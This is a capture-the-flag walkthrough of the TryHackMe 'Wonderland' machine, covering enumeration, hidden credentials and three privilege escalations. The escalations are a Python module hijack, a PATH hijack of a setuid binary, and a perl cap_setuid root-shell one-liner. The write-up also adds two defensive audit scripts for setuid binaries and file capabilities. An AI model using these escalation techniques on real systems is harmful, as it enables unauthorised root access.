Wonder Land | Walk Through | Try hack me

          //////JOINED Wonder land/////////

–||/| SCANNING |\||–

 

STARTED NMAP SCAN — nmap -sC -sV -p 1-5000 -T3 10.10.5.154

Result —

Nmap scan report for 10.10.5.154
The host is up (0.30s latency).
Not shown: 4998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

||||||||||||
Only two ports are open in the scanned range (1-5000): SSH on 22 and a Go-based HTTP server on 80.
||||||||||||

STARTED GOBUSTER FOR FINDING THE DIRECTORIES — gobuster dir -u http://10.10.5.154 -w /usr/share/wordlists/dirb/common.txt -z

Result —

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.5.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/24 18:46:48 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/index.html (Status: 301) [Size: 0] [--> ./]
/r (Status: 301) [Size: 0] [--> r/]

===============================================================
2021/07/24 18:49:14 Finished
===============================================================

|||||||||
Gobuster found three directories, nothing useful in them: /img only holds three images.
In /r we found this:
Keep Going.

“Would you tell me, please, which way I ought to go from here?”

So that’s why I started scanning further inside the /r directory!
|||||||||

STARTED FURTHER SCANNING OF DIR /R WITH THE MEDIUM WORDLIST — gobuster dir -u http://10.10.5.154/r/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z

Result —

That scan found only the /a/ directory, and there I found:
Keep Going.

“That depends a good deal on where you want to get to,” said the Cat.

As mentioned before, the /img directory contained three pictures; checking their Exif metadata with an online tool turned up nothing.

Then I extracted hidden data from the rabbit picture with steghide:

steghide extract -sf

The result: follow the r a b b i t

|||||||||

So I STARTED TO FOLLOW THE RABBIT ON THE WEB SERVER AT /r/a/b/b/i/t
There I found this:
Open the door and enter the wonderland

“Oh, you’re sure to do that,” said the Cat, “if you only walk long enough.”

Alice felt that this could not be denied, so she tried another question. “What sort of people live about here?”

“In that direction,” the Cat said, waving its right paw round, “lives a Hatter: and in that direction,” waving the other paw, “lives a March Hare. Visit either you like: they’re both mad.”
||||||||||

AFTER VIEWING THE PAGE SOURCE I FOUND THIS:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

||||||||||

Found the username and password for SSH!

||||||||||

LOGGED INTO THE MACHINE AND FOUND USER.TXT IN ROOT!

This is the time to escalate the privilege!

 


                    \\\\\\\\\\ PRIVILEGE ESCALATION //////////

Looking at our privileges with sudo -l reveals the following:

sudo -l
[sudo] password for Alice:
Matching Defaults entries for Alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
We can run sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py as the user rabbit.

Even though we only have read access to walrus_and_the_carpenter.py and can’t edit it, let’s see what the file does when executed.

import random

poem = """ The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —

And this was odd because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —

"It's very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because

No cloud was in the sky:
No birds were flying overhead —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see

Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"""

# […] remaining stanzas omitted

for i in range(10):
    line = random.choice(poem.split("\n"))
    print(line)  # the script prints the chosen line to the screen

Due to the length of the file, I’ve removed some of the poem that is printed to the screen when the file is executed.

At the top of the file, we can see that the Python module random is imported.
So, what if we create a file named random.py in our current working directory that executes /bin/bash? That way our file would be loaded instead of the “real” random module, giving us a shell as the rabbit user.

Our random.py:

import os

os.system("/bin/bash")

Executing the python script:

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
Awesome! We have escalated our privileges to the rabbit user.

 


Looking in /home/rabbit/ we find a setuid binary, and by examining the file we see that date is executed without specifying an absolute path:

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
We can abuse this by exporting our own $PATH, writing a small script called date and running the setuid binary.

Exporting our own $PATH:

rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Now, every time a program is called without specifying an absolute path, our shell will first look in /tmp.

Creating our malicious date file

We now create a shell script called date, place that in /tmp and make it executable with chmod +x /tmp/date.

rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash
All we now need to do is run the setuid binary and we should escalate to the user hatter.

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
Awesome! We’re getting close.
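As an added example (not from the original walkthrough and not the teaParty binary’s code), here is a small Python audit that does the check the text describes by hand: it walks a tree for setuid/setgid binaries, pulls printable strings out of each the way strings(1) does, and flags strings that look like a shell command line yet call a command by bare name, so that the command is resolved through the caller’s PATH. The SAMPLE_BINARY bytes are constructed for the demo and embed the command line quoted above; the command-line heuristic (a control operator or a leading absolute path) is my own, and what it flags still needs a human look.

```python
import os
import re
import shlex
import stat
import sys

# Shell control operators that separate simple commands on one line.
CONTROL_OPERATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")
# Runs of printable ASCII, the same idea as strings(1).
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")

# Constructed stand-in for the binary's bytes: an ELF-looking prefix plus a few
# embedded strings, including the command line quoted in the walkthrough.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"Welcome to the tea party!\x00"
    + b"/bin/echo -n 'Probably by ' && date --date='next hour' -R\x00"
    + b"/bin/ls -la /home/rabbit\x00"
    + b"Ask very nicely, and I will give you some tea while you wait for him\x00"
)


def embedded_strings(blob):
    """Printable ASCII runs in blob, decoded."""
    return [m.decode("ascii") for m in PRINTABLE_RUN.findall(blob)]


def command_words(line):
    """First word of every simple command on a shell command line."""
    words = []
    for segment in CONTROL_OPERATORS.split(line):
        try:
            tokens = shlex.split(segment)
        except ValueError:  # unbalanced quotes: not a shell command line
            continue
        if tokens:
            words.append(tokens[0])
    return words


def relative_commands_in(blob):
    """(string, [bare command names]) for each embedded string that looks like
    a shell command line and invokes some command without an absolute path.

    Heuristic: a string counts as a command line if it contains a control
    operator or starts with an absolute path; prose strings are skipped.
    """
    findings = []
    for s in embedded_strings(blob):
        if not (CONTROL_OPERATORS.search(s) or s.startswith("/")):
            continue
        relative = [w for w in command_words(s) if not w.startswith("/")]
        if relative:
            findings.append((s, relative))
    return findings


def find_privileged_binaries(root):
    """Regular files under root with the setuid or setgid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return hits


def audit_tree(root):
    """Yield (path, findings) for privileged binaries whose embedded command
    lines call a command by bare name, i.e. resolved through PATH."""
    for path in find_privileged_binaries(root):
        try:
            with open(path, "rb") as fh:
                blob = fh.read()
        except OSError:
            continue
        findings = relative_commands_in(blob)
        if findings:
            yield path, findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, findings in audit_tree(root):
        for command_line, relative in findings:
            print(f"{path}: {relative} resolved via PATH in: {command_line}")
```

Run it as python3 audit_setuid.py / on a host and every hit is a candidate for exactly the PATH hijack shown above. The fix belongs in the binary: call /bin/date by absolute path, or set PATH to a fixed safe value before calling system(3); sudo’s secure_path does not apply to setuid binaries, and the caller fully controls the environment they inherit.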

Looking in the home directory of the user hatter reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user hatter:

ssh hatter@<target-ip>
hatter@<target-ip>'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Fri Jun 5 22:48:04 UTC 2020

System load: 0.07 Processes: 95
Usage of /: 19.4% of 19.56GB Users logged in: 1
Memory usage: 32% IP address for eth0: 10.10.167.35
Swap usage: 0%

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jun 5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)
Doing some basic enumeration reveals that perl has the following capability set: cap_setuid+ep

hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
We can easily abuse this and escalate to root!

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
We can now finally get the root.txt flag as well!!
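As an added example (not from the walkthrough, and not getcap’s own code), this Python script reads the security.capability extended attribute that getcap -r reports and decodes it (struct vfs_cap_data, revisions 1 to 3), so that a tree can be audited for file capabilities that are root-equivalent on their own, cap_setuid among them. The two SAMPLE_XATTR values are constructed: one matches the cap_setuid+ep entry above, the other is a revision-3 entry with a namespace root id. The CAP_NAMES table is a subset of linux/capability.h and the RISKY_CAPS selection is my own.

```python
import os
import struct
import sys

# Subset of capability numbers from <linux/capability.h>; others print as cap_N.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap",
    12: "cap_net_admin", 13: "cap_net_raw", 16: "cap_sys_module",
    17: "cap_sys_rawio", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
    31: "cap_setfcap",
}
# Capabilities that by themselves let a process become root or read/write
# anything (my own selection, not an official list).
RISKY_CAPS = {1, 2, 6, 7, 8, 16, 17, 19, 21, 31}

# Layout of the security.capability xattr value (struct vfs_cap_data).
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_1 = 0x01000000   # one 32-bit word per set, 12 bytes
VFS_CAP_REVISION_2 = 0x02000000   # two words per set, 20 bytes
VFS_CAP_REVISION_3 = 0x03000000   # revision 2 plus a namespace root id, 24 bytes
VFS_CAP_FLAGS_EFFECTIVE = 0x000001

# Constructed sample values: cap_setuid permitted+effective (revision 2), and a
# revision-3 entry with setgid+setuid permitted, setuid inheritable, rootid 1000.
SAMPLE_XATTR_REV2 = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE,
                                1 << 7, 0, 0, 0)
SAMPLE_XATTR_REV3 = struct.pack("<IIIIII", VFS_CAP_REVISION_3,
                                (1 << 6) | (1 << 7), 1 << 7, 0, 0, 1000)


def bit_numbers(mask):
    """Set of bit positions that are 1 in mask."""
    return {n for n in range(mask.bit_length()) if (mask >> n) & 1}


def decode_vfs_caps(raw):
    """Decode a security.capability xattr value into permitted/inheritable
    sets, the effective flag and (revision 3) the namespace root id."""
    (magic_etc,) = struct.unpack_from("<I", raw, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    words = 1 if revision == VFS_CAP_REVISION_1 else 2
    permitted = inheritable = 0
    for i in range(words):
        p, h = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= h << (32 * i)
    rootid = struct.unpack_from("<I", raw, 20)[0] if revision == VFS_CAP_REVISION_3 else 0
    return {"permitted": bit_numbers(permitted), "inheritable": bit_numbers(inheritable),
            "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE), "rootid": rootid}


def cap_name(n):
    return CAP_NAMES.get(n, f"cap_{n}")


def format_caps(caps):
    """getcap-style text such as 'cap_setuid+ep' (flag order e, i, p)."""
    parts = []
    for n in sorted(caps["permitted"] | caps["inheritable"]):
        flags = ""
        if caps["effective"] and n in caps["permitted"]:
            flags += "e"
        if n in caps["inheritable"]:
            flags += "i"
        if n in caps["permitted"]:
            flags += "p"
        parts.append(f"{cap_name(n)}+{flags}")
    return ",".join(parts)


def risky_caps(caps):
    """Names of permitted capabilities that are root-equivalent on their own."""
    return [cap_name(n) for n in sorted(caps["permitted"] & RISKY_CAPS)]


def file_caps(path):
    """Decoded capabilities of path, or None if it has none (Linux only)."""
    if not hasattr(os, "getxattr"):
        return None
    try:
        raw = os.getxattr(path, "security.capability", follow_symlinks=False)
    except OSError:  # ENODATA (no caps), unsupported filesystem, or no access
        return None
    return decode_vfs_caps(raw)


def audit_caps(root):
    """Yield (path, getcap-style text, risky names) for files with risky caps."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            caps = file_caps(path)
            if caps and risky_caps(caps):
                yield path, format_caps(caps), risky_caps(caps)


if __name__ == "__main__":
    for path, text, risky in audit_caps(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{path} = {text}  <- risky: {', '.join(risky)}")
```

Running python3 audit_caps.py /usr/bin on a Linux host lists the same entries as getcap -r /usr/bin, with the root-equivalent ones called out. A perl carrying cap_setuid+ep can call setuid(0) for anyone allowed to execute it, so such a capability belongs only on a binary that drops it immediately after use, and preferably on none at all.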

Try hack me Wonderland Walk Through is Completed!

                 ///////////////// Wonder Land COMPLETED/////////////////////////

 

 
